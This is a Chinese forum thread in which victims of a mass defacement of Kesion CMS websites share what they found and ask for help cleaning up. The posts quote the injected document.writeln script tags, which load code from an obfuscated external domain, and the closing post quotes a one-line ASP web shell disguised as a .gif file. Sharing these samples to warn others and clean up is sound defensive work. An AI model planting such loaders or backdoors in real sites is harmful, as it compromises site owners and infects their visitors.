我人生的一个转折点又一次改变了,先声明，我不是怪科讯系统，系统是挺好的。

我一直从事服务器安全维护这个行业，一直用科讯做站。对网站安全性一直很重视.

一个月纯收入有十万以上。

这次挂马事件，导至我七个服务器完全被挂完，挂得一个不留，数据太多了，也没打算清理了。

这次挂的马也怪。JS html 全挂上了。

document.writeln('<script id="scr7ipt5552" type="text/javascript" src="http://pt928.99%36%36.org" language="JavaScript"  ><\/script>');

document.writeln('<script language="JavaScript" src="http://pt%3928.%39%3966.org" type="text/javascript" id="scr7ipt938"  ><\/script>');

document.writeln('<script language="JavaScript" type="text/javascript" id="scr7ipt264" src="http://pt%3928.%39%3966.org"  ><\/script>');

document.writeln('<script language="JavaScript" id="scr7ipt3172" src="http://pt92%38.9966.org" type="text/javascript"  ><\/script>');

document.writeln('<script language="JavaScript" type="text/javascript" src="http://pt%3928.%39%3966.org" id="scr7ipt7790"  ><\/script>');

这是一部分JS挂的。 代码不断变化。批量清都不知道咱清了。如有高手来靠之办法。愿意以各种渠道酬谢.

如有高手。请发信到这个号的邮箱 兄弟。感谢不尽。

我也是一样,,有没好的办法解决

在这里。我特别感谢一下 ID为 liu123456  为我解决了痛苦。

这个兄弟。希望。你留下你的联系方式。

兄弟。我在线等你。

兄弟。我在线等你。

兄弟。我在线等你。

兄弟。我在线等你。

iu123456 这个ID的朋友。请留下联系方式

反正保留数据库我是试了的。估计不行。看情况了。我准备不更新了。如果再这么下去。就让其死掉算了。心力全失了

同情你，我能理解，我的2个网站也一样中招了，跟你说的一样。日放马的。

我清理的办法是，在线清理根目录下所有“.org” ，可暂时阻止脚本的运行，网站暂时可以运行，可应急， 但解决不了实质。

具体方法：http://bbs.kesion.com/dispbbs.asp?boardid=41&Id=97763&page=2

实在是有些伤心了，整了几次了，我的流量全没了！

准备改换门庭，投入PHP的怀抱，linux服务器，至少安全性上好一些。

木马代码如下:

勿点击链接.

代码1:

 <script src="http://pt928%2E9966%2Eorg" type="text/javascript" language="JavaScript" id="scr7ipt8823"  ></script>

代码2:

document.writeln('<script type="text/javascript" language="JavaScript" src="http://pt%3928.%39%3966.org" id="scr7ipt3680"  ><\/script>');

大家要特别注意每个文件夹下是否有 [  289582993.asp;.gif  ] 这个文件,编号可能是随机的.它不是图片文件,而是小马,只要有它可以肯定是木马了,用右键--编辑--记事本打开,可以看到<%execute request(chr(35))%>代码,即使你用正则替换了代码,也没有用,这个小马是个桥梁,黑客还可以继续上传大马的.记住一定检查一下,干掉它.